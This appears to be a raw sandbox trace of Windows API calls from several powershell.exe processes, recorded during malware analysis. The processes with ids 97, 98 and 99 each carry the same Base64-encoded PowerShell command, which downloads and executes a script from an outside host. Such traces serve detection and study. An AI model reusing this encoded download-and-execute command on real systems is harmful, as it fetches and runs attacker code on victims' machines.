returned 1
	[0706.053] CoTaskMemFree (pv=0x1b870760) 
	[0706.054] CloseHandle (hObject=0x34c) returned 1
	[0706.054] CoTaskMemAlloc (cb=0x3b) returned 0x25d410
	[0706.055] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c83de08, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c83de08) returned 0x4550
	[0706.055] CoTaskMemFree (pv=0x25d410) 
	[0706.058] GetCurrentProcess () returned 0xffffffffffffffff
	[0706.058] GetCurrentProcess () returned 0xffffffffffffffff
	[0706.059] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x398, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c83dee8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c83dee8*=0x34c) returned 1

Process:
	id = "97"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x6bd55000"
	os_pid = "0x1294"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 509
	os_tid = 0x1298


Thread:
	id = 524
	os_tid = 0x1314


Thread:
	id = 528
	os_tid = 0x1334


Thread:
	id = 1577
	os_tid = 0x2118


Thread:
	id = 1595
	os_tid = 0x2168


Thread:
	id = 1614
	os_tid = 0x21f0


Thread:
	id = 1715
	os_tid = 0x2094


Process:
	id = "98"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0xb963000"
	os_pid = "0x12bc"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 514
	os_tid = 0x12c0


Thread:
	id = 541
	os_tid = 0x13a4


Thread:
	id = 548
	os_tid = 0x13d4


Process:
	id = "99"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x8371000"
	os_pid = "0x12e0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 517
	os_tid = 0x12e4

	[0544.132] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0547.987] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0547.987] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0547.987] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0547.988] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0564.327] GetVersionExW (in: lpVersionInformation=0x16dec0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16dec0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0564.330] GetVersionExW (in: lpVersionInformation=0x16dec0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16dec0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0564.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0564.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0564.343] GetVersionExW (in: lpVersionInformation=0x16dc30*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16dc30*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0564.344] SetErrorMode (uMode=0x1) returned 0x1
	[0564.345] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x16dd90 | out: lpFileInformation=0x16dd90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0564.346] SetErrorMode (uMode=0x1) returned 0x1
	[0565.567] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x16e000 | out: lpdwHandle=0x16e000) returned 0x94c
	[0565.569] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2ca72d8 | out: lpData=0x2ca72d8) returned 1
	[0565.571] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16df78, puLen=0x16df70 | out: lplpBuffer=0x16df78*=0x2ca7374, puLen=0x16df70) returned 1
	[0565.574] lstrlenW (lpString="䅁") returned 1
	[0565.583] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x16dee8, puLen=0x16dee0 | out: lplpBuffer=0x16dee8*=0x2ca7450, puLen=0x16dee0) returned 1
	[0565.584] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0565.586] CoTaskMemAlloc (cb=0x2e) returned 0x2e93d0
	[0565.586] lstrcpyW (in: lpString1=0x2e93d0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0565.587] CoTaskMemFree (pv=0x2e93d0) 
	[0565.588] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x16dee8, puLen=0x16dee0 | out: lplpBuffer=0x16dee8*=0x2ca74a4, puLen=0x16dee0) returned 1
	[0565.588] lstrlenW (lpString="System.Management.Automation") returned 28
	[0565.588] CoTaskMemAlloc (cb=0x3c) returned 0x229860
	[0565.588] lstrcpyW (in: lpString1=0x229860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0565.588] CoTaskMemFree (pv=0x229860) 
	[0565.588] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x16dee8, puLen=0x16dee0 | out: lplpBuffer=0x16dee8*=0x2ca7500, puLen=0x16dee0) returned 1
	[0565.588] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0565.588] CoTaskMemAlloc (cb=0x20) returned 0x2e7620
	[0565.588] lstrcpyW (in: lpString1=0x2e7620, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0565.588] CoTaskMemFree (pv=0x2e7620) 
	[0565.588] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x16dee8, puLen=0x16dee0 | out: lplpBuffer=0x16dee8*=0x2ca7540, puLen=0x16dee0) returned 1
	[0565.588] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0565.588] CoTaskMemAlloc (cb=0x44) returned 0x229860
	[0565.588] lstrcpyW (in: lpString1=0x229860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0565.588] CoTaskMemFree (pv=0x229860) 
	[0565.588] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x16dee8, puLen=0x16dee0 | out: lplpBuffer=0x16dee8*=0x2ca75a8, puLen=0x16dee0) returned 1
	[0565.588] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0565.588] CoTaskMemAlloc (cb=0x76) returned 0x291170
	[0565.588] lstrcpyW (in: lpString1=0x291170, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0565.589] CoTaskMemFree (pv=0x291170) 
	[0565.589] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x16dee8, puLen=0x16dee0 | out: lplpBuffer=0x16dee8*=0x2ca7644, puLen=0x16dee0) returned 1
	[0565.589] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0565.589] CoTaskMemAlloc (cb=0x44) returned 0x229860
	[0565.589] lstrcpyW (in: lpString1=0x229860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0565.589] CoTaskMemFree (pv=0x229860) 
	[0565.589] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x16dee8, puLen=0x16dee0 | out: lplpBuffer=0x16dee8*=0x2ca76a8, puLen=0x16dee0) returned 1
	[0565.589] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0565.589] CoTaskMemAlloc (cb=0x58) returned 0x277460
	[0565.589] lstrcpyW (in: lpString1=0x277460, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0565.589] CoTaskMemFree (pv=0x277460) 
	[0565.589] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x16dee8, puLen=0x16dee0 | out: lplpBuffer=0x16dee8*=0x2ca7724, puLen=0x16dee0) returned 1
	[0565.589] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0565.589] CoTaskMemAlloc (cb=0x20) returned 0x2e7620
	[0565.589] lstrcpyW (in: lpString1=0x2e7620, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0565.589] CoTaskMemFree (pv=0x2e7620) 
	[0565.589] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x16dee8, puLen=0x16dee0 | out: lplpBuffer=0x16dee8*=0x2ca73cc, puLen=0x16dee0) returned 1
	[0565.589] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0565.589] CoTaskMemAlloc (cb=0x66) returned 0x26c1a0
	[0565.590] lstrcpyW (in: lpString1=0x26c1a0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0565.590] CoTaskMemFree (pv=0x26c1a0) 
	[0565.590] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x16dee8, puLen=0x16dee0 | out: lplpBuffer=0x16dee8*=0x0, puLen=0x16dee0) returned 0
	[0565.590] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x16dee8, puLen=0x16dee0 | out: lplpBuffer=0x16dee8*=0x0, puLen=0x16dee0) returned 0
	[0565.590] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x16dee8, puLen=0x16dee0 | out: lplpBuffer=0x16dee8*=0x0, puLen=0x16dee0) returned 0
	[0565.590] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16deb8, puLen=0x16deb0 | out: lplpBuffer=0x16deb8*=0x2ca7374, puLen=0x16deb0) returned 1
	[0565.591] CoTaskMemAlloc (cb=0x204) returned 0x293c30
	[0565.591] VerLanguageNameW (in: wLang=0x0, szLang=0x293c30, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0565.592] CoTaskMemFree (pv=0x293c30) 
	[0565.593] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\", lplpBuffer=0x16df08, puLen=0x16df00 | out: lplpBuffer=0x16df08*=0x2ca7300, puLen=0x16df00) returned 1
	[0565.599] GetCurrentProcessId () returned 0x12e0
	[0566.862] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x16ce30 | out: lpLuid=0x16ce30*(LowPart=0x14, HighPart=0)) returned 1
	[0566.865] GetCurrentProcess () returned 0xffffffffffffffff
	[0566.866] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x16ce50 | out: TokenHandle=0x16ce50*=0x1c0) returned 1
	[0566.866] AdjustTokenPrivileges (in: TokenHandle=0x1c0, DisableAllPrivileges=0, NewState=0x2caab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0566.868] CloseHandle (hObject=0x1c0) returned 1
	[0566.872] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x12e0) returned 0x1c0
	[0566.889] EnumProcessModules (in: hProcess=0x1c0, lphModule=0x2caabb8, cb=0x200, lpcbNeeded=0x16de68 | out: lphModule=0x2caabb8, lpcbNeeded=0x16de68) returned 1
	[0566.891] GetModuleInformation (in: hProcess=0x1c0, hModule=0x13f370000, lpmodinfo=0x2caae28, cb=0x18 | out: lpmodinfo=0x2caae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0568.219] CoTaskMemAlloc (cb=0x804) returned 0x2f0d50
	[0568.219] GetModuleBaseNameW (in: hProcess=0x1c0, hModule=0x13f370000, lpBaseName=0x2f0d50, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0568.219] CoTaskMemFree (pv=0x2f0d50) 
	[0568.220] CoTaskMemAlloc (cb=0x804) returned 0x2f0d50
	[0568.220] GetModuleFileNameExW (in: hProcess=0x1c0, hModule=0x13f370000, lpFilename=0x2f0d50, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0568.220] CoTaskMemFree (pv=0x2f0d50) 
	[0568.221] CloseHandle (hObject=0x1c0) returned 1
	[0568.229] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x12e0) returned 0x1c0
	[0568.230] GetExitCodeProcess (in: hProcess=0x1c0, lpExitCode=0x16df98 | out: lpExitCode=0x16df98*=0x103) returned 1
	[0568.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12cab088, Length=0x20000, ResultLength=0x16df60 | out: SystemInformation=0x12cab088, ResultLength=0x16df60*=0x341a0) returned 0xc0000004
	[0568.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12ccb0b8, Length=0x369a0, ResultLength=0x16df60 | out: SystemInformation=0x12ccb0b8, ResultLength=0x16df60*=0x341a0) returned 0x0
	[0569.713] EnumWindows (lpEnumFunc=0x2a066ac, lParam=0x0) 
	[0569.715] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x4d0
	[0571.916] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x558
	[0571.916] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x4d0
	[0571.916] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x4d0
	[0571.916] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x4d0
	[0571.916] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x538
	[0571.917] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x4d0
	[0571.917] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x778
	[0571.917] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x778
	[0571.917] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x4d0
	[0571.917] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x4d0
	[0571.917] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x4d0
	[0571.917] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x4d0
	[0571.917] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x4d0
	[0571.918] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x4d0
	[0571.918] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x4d0
	[0571.918] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x4d0
	[0571.918] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x460
	[0571.918] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x4d0
	[0571.918] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x4d0
	[0571.918] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1a78
	[0571.919] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1b90
	[0571.919] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1b04
	[0571.919] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1b34
	[0571.919] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1b64
	[0571.919] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1bb0
	[0571.919] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1acc
	[0571.919] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1a2c
	[0571.919] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x19a8
	[0571.920] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1944
	[0571.920] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x18c8
	[0571.920] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x18ac
	[0571.920] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x18ec
	[0571.920] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1898
	[0571.920] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0xc98
	[0571.920] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x153c
	[0571.920] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1808
	[0571.920] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x12a4
	[0571.921] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1740
	[0571.921] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x16c4
	[0571.921] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1820
	[0571.921] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x16ac
	[0571.921] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1858
	[0571.921] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1664
	[0571.921] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x10b4
	[0571.921] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x10ac
	[0571.922] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x10ec
	[0571.922] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x1068
	[0571.922] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x17e0
	[0571.922] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x16dcc0 | out: lpdwProcessId=0x16dcc0) returned 0x102c
